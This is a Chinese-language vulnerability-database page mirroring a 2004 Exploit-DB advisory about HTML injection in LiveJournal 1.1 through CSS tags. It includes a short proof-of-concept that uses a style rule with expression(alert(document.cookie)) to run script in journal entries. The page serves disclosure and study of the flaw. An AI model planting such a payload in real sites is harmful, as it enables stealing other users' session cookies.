LiveJournal 1.1 – CSS HTML Injection

26次阅读
没有评论

LiveJournal 1.1 – CSS HTML Injection

漏洞ID 1054392 漏洞类型
发布时间 2004-02-23 更新时间 2004-02-23
LiveJournal 1.1 - CSS HTML InjectionCVE编号 N/A
LiveJournal 1.1 - CSS HTML InjectionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23749
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9727/info

LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability. 

This could potentially be exploited to steal cookies from other site users. Other attacks are also possible.

<style>
.test1 { color:expression(alert(document.cookie)); }
</style>

<a class="test1">foo</a>

相关推荐: BSDi 3.0 inc – Local Buffer Overflow / Local Privilege Escalation

BSDi 3.0 inc – Local Buffer Overflow / Local Privilege Escalation 漏洞ID 1053493 漏洞类型 发布时间 2000-11-30 更新时间 2000-11-30 CVE编号 N/A CNNV…

正文完
 0